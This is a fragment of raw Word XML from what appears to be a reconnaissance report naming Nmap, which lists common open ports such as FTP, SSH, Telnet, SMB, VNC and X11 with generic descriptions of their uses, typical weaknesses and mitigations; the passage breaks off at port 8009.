          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active Reconassaince</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F16E6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E5099" w14:textId="098CBEC1" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CA29897" wp14:editId="57C7080D">
            <wp:extent cx="4972050" cy="2940050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1741828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050" cy="2940050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD6A54B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5490126D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open Ports Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361FB3D1" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 21 (FTP - File Transfer Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942390E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 21 is used for FTP connections, facilitating the transfer of files between a client and a server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93D002" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Some vulnerabilities associated with FTP include weak authentication, unencrypted data transmission (including usernames and passwords), and potential for unauthorized access or data manipulation if the FTP server is misconfigured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9FDBBB" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BD6A48" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 22 (SSH - Secure Shell):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2FB5C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 22 is used for SSH connections, providing secure remote administration and secure file transfer over a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3891E2E5" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities: Common vulnerabilities of SSH include weak passwords, brute-force attacks, and vulnerabilities in SSH server implementations. It is crucial to use strong passwords, disable root login if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>possible, and keep SSH server software up to date to mitigate risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA494D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389AEE35" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 23 (Telnet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB13BED" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 23 is traditionally used for Telnet, which allows remote access to servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54B050" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Telnet is considered insecure due to the lack of encryption, which can expose login credentials and sensitive information to interception by attackers. It is generally recommended to use SSH instead of Telnet for secure remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FCD644" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B4A315" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 25 (SMTP - Simple Mail Transfer Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E10ED4" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 25 is used for email communication, specifically for sending email messages between mail servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6202CFAD" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Some vulnerabilities associated with SMTP include open relay, which allows unauthorized users to send spam through the server, and the potential for email spoofing and phishing attacks. Secure configuration, spam filtering, and implementing sender authentication mechanisms (e.g., SPF, DKIM) can help mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E61902" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365A308D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 80 (HTTP - Hypertext Transfer Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D056E5C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 80 is used for serving web pages over the internet. It is the default port for unencrypted HTTP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146790CC" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Common vulnerabilities of web servers on port 80 include web application vulnerabilities (e.g., XSS, SQL injection), server misconfigurations, and potential for unauthorized access. Regularly patching web server software, implementing secure coding practices, and using web application firewalls can help address these vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A9FA0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523A9BD5" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 111 (RPC - Remote Procedure Call):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D792AFF" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 111 is associated with RPC, a protocol used for communication between networked systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7352B4" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: RPC services can be vulnerable to various attacks, including buffer overflow, remote code execution, and unauthorized access. It is crucial to apply security patches, disable unnecessary RPC services, and use access control mechanisms to mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F38839C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061D9E57" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 139 (NetBIOS - Network Basic Input/Output System):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39501898" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 139 is associated with NetBIOS, an older protocol used for file and print sharing services in Windows networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC4068" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities: NetBIOS services on port 139 can be vulnerable to exploits like the infamous WannaCry ransomware attack. Attackers can target weaknesses such as unpatched systems, weak passwords, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>misconfigurations to gain unauthorized access or execute malicious activities. Securing Windows systems, using strong passwords, and blocking external access to port 139 can help reduce the associated risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFB0AB" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B976A0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 5432 (PostgreSQL Database):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E089E2E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 5432 is the default port for PostgreSQL database servers, used for managing and accessing PostgreSQL databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9448B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Common vulnerabilities associated with PostgreSQL include weak or default passwords, SQL injection, and vulnerabilities in the PostgreSQL server software. Regularly updating PostgreSQL, using strong passwords, implementing proper user access controls, and securing web applications that interact with PostgreSQL can help mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B76FD3" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2349B7A3" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 5900 (VNC - Virtual Network Computing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E16B4B7" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 5900 is commonly used by VNC for remote desktop access to graphical desktop environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FBBC8" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: VNC can be vulnerable to attacks such as weak or no authentication, brute-force attacks, and insecure configurations. It is important to use strong passwords, enable encryption for VNC connections, and restrict access to trusted IP addresses to enhance security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64739F53" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B431C8" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 6000 (X11 - X Window System):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E69E73" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 6000 is associated with the X11 protocol, used for graphical display and remote access to X Window System servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B595E9E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: X11 can be vulnerable to attacks like unauthorized access, display spoofing, and traffic interception. Proper X11 server configuration, disabling X11 forwarding over untrusted networks, and using secure protocols like SSH for remote access can help mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FC01F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCA2E3E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 6667 (IRC - Internet Relay Chat):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065CD738" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 6667 is commonly used for IRC, a real-time messaging protocol for group communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B938E4" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Some vulnerabilities associated with IRC include unauthorized access, malware distribution, and exploitation of IRC clients or servers. Securing IRC servers with strong passwords, monitoring for abuse, and keeping IRC client software up to date are important measures to mitigate risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C8497D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB7FEE6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 8009 (Apache JServ Protocol / Tomcat AJP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAAA20" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
